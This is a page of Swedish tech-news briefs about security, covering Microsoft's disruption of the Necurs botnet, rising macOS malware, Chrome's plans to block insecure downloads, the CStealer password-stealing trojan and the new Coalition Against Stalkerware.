Microsoft meddelade igår att de tillsammans med partners i 35 länder nu verkar ha orsakat störningar för det stora botnätet Necurs, ett botnät som mestadels tros användas för att skicka spam-mail. Malwaret bakom Necurs har infekterat runt 9 miljoner datorer runt om i världen enligt Microsofts analys. Microsoft analyserade verksamheten i Necurs botnät under cirka 2 månaders tid och kunde då bland annat se att en av de infekterade datorerna skickade ut runt 3,8 miljoner spam-mail under den tidsperioden. Det innebär med andra ord att de 9 miljonerna datorerna som ingår i Necurs botnät tillsammans har haft potential att skicka ut miljardtals spam om dagen. Microsoft har haft ögonen på Necurs ända sedan 2012 och verkar nu ha kommit på ett listigt sätt att förhindra Necurs verksamhet. Med hjälp av en algoritm ska Microsoft ha genererat en lista på 6 miljoner internetdomäner som skulle kunna komma att användas av Necurs de kommande 25 månaderna. Genom att meddela världens domänregistratorer vilka domäner det gällde så säger sig Microsoft åtminstone delvis nu ha stängt ner Necurs verksamhet. Förutom det så har en amerikansk domstol nu gett Microsoft rätten att ta kontroll över Necurs amerikanska infrastruktur när det gäller domäner. Necurs har infekterat datorer runt om i världen med sitt botnet-malware åtminstone sedan 2012. Förutom att ha använts för att skicka spam så misstänks personerna bakom Necurs även ha använt botnätet för att sprida andra malware så väl som aktie- och dejtingbluffar. Amerikansk polis misstänker att Necurs drivs av personer hemmahörande i Ryssland. Tumnagel
65.2°
+
Wille Wilhelmsson
0

macOS oftare utsatta för malware än Windows förra året
Trendbrott

Säkerhetsföretaget Malwarebytes uppger i sin rapport "2020 State of Malware Report" att macOS förra året oftare utsattes för malware-attacker än vad Windows gjorde, något som aldrig har hänt tidigare. Malware-attackerna mot macOS ökade totalt med över 400 procent över året men då även antalet macOS-användare ökade så är den siffran inte så jätterelevant. Hur ofta en enskild instans av macOS attackerades är dock lite intressantare och där ökade detta från i genomsnitt 4,8 stycken attacker 2018 till hela 11 stycken under förra året. Det kan jämföras med Windows-maskiner som i genomsnitt utsattes för 5,8 stycken malware-attacker under förra året. Historiskt sett har det spridits uppgifter om att macOS i stort sett aldrig drabbas av virus eller andra tråkigheter som har drabbats windows-användare men den myten är det nog dags att nu avliva en gång för alla. I takt med att macOS har blivit ett allt populärare operativsystem har givetvis risken för att utsättas för olika typer av cyberbrott även ökat för macOS-användare. Tumnagel
45.9°
+
Wille Wilhelmsson
0

Snart börjar Chrome blockera osäkra nedladdningar
Så att du inte tankar hem några tråkigheter av misstag

Google meddelade förra veckan att deras webbläsare Chrome inom kort kommer att börja varna för filer som användare försöker ladda ner från vad Google anser vara osäkra källor. Det handlar om filer som inte laddas ner över det krypterade HTTPS-protokollet som Chrome initialt kommer att börja varna för och framöver blockera helt. I ett blogginlägg skriver Chrome-utvecklaren Joe DeBlasio bland annat om osäkra nedladdningar via webbläsare: "Insecurely-downloaded files are a risk to usersx27 security and privacy. For instance, insecurely-downloaded programs can be swapped out for malware by attackers, and eavesdroppers can read usersx27 insecurely-downloaded bank statements. To address these risks, we plan to eventually remove support for insecure downloads in Chrome." Chromes varningar och blockeringar av filer från osäkra källor kommer att dra igång i samband med att Google släpper Chrome 82 i april och fortsätta i kommande Chrome-versioner som släpps under året. Ni kan kolla in hur Googles tidsplan ser ut för det hela i tabellen här nedanför. Tumnagel
41.8°
+
Wille Wilhelmsson
0
2019

Trojanen CStealer snor lösenord från Chrome
Ny elak trojan drabbar Windows-användare

Säkerhetsanalytikerna på MalwareHunterTeam har upptäckt en ny trojan till Windows som försöker komma över lösenord som lagrats i Googles webbläsare i Chrome. Det är inte första gången det har upptäckts trojaner som försöker sig på detta men den nya trojanen som upptäckts nu skickar vidare eventuella lösenord som den hittat och lagrar dessa i en publik databas. Den nya trojanen har fått namnet "CStealer" och då den lagrar de stulna lösenorden i en öppen databas på nätet finns risken att även andra kan komma över den informationen. Bleeping Computer skriver att alla som har kompetens att analysera CStealer kan hitta uppgifter om hur de kopplar upp sig mot databasen i fråga och sedan är det bara att börja tanka information om den. Hur CStealer infekterar datorer och hur många som eventuellt kan vara drabbade av trojanen finns det än så länge inga uppgifter om. Vill man vara på den säkra sidan så uppmanas Windows-användare att inte lagra känsliga lösenord i Chrome. Tumnagel
23.8°
+
Wille Wilhelmsson
0

Coalition Against Stalkerware ska bekämpa otäcka malwares
Ny organisation startad av EFF och massa säkerhetsföretag

Electronic Frontier Foundation (EFF), den ideella organisationen som arbetar för digitala rättigheter på nätet, drar nu tillsammans med ett gäng andra organisationer, antivirus- och säkerhetsföretag igång organisationen "Coalition Against Stalkerware" (CAS). Precis som den nybildade organisationens namn antagligen förklarar så ska CAS arbeta för att skydda användare från att utsättas för så kallat "stalkerware", oönskad programvara som kan övervaka användare och skicka detta vidare till spioner, myndigheter i auktoritära stater som inte respekterar medborgarnas integritet, partners, ex-partners, arbetsgivare, random psykopat eller andra som av någon anledning vill övervaka någon. Grundarmedlemmarna i CAS är Avira, EFF, G Data, Kaspersky, Malwarebytes, National Network to End Domestic Violence, NortonLifeLock, Operation Safe Escape, Weisser Ring samt Work with Perpetrators of Domestic Violence. Det primära syftet med CAS beskrivs som: "The key objectives of the Coalition include improving detection and mitigation of stalkerware, educating victims and advocacy organizations about technical aspects, and of course raising awareness about the issue." På CAS webbplats som hittas på länken nedan kan användare få tips om hur de upptäcker om de är drabbade av stalkerware och vad de kan göra om så skulle vara fallet. Tumnagel
41.9°
+
Wille Wilhelmsson
0
Nästa sida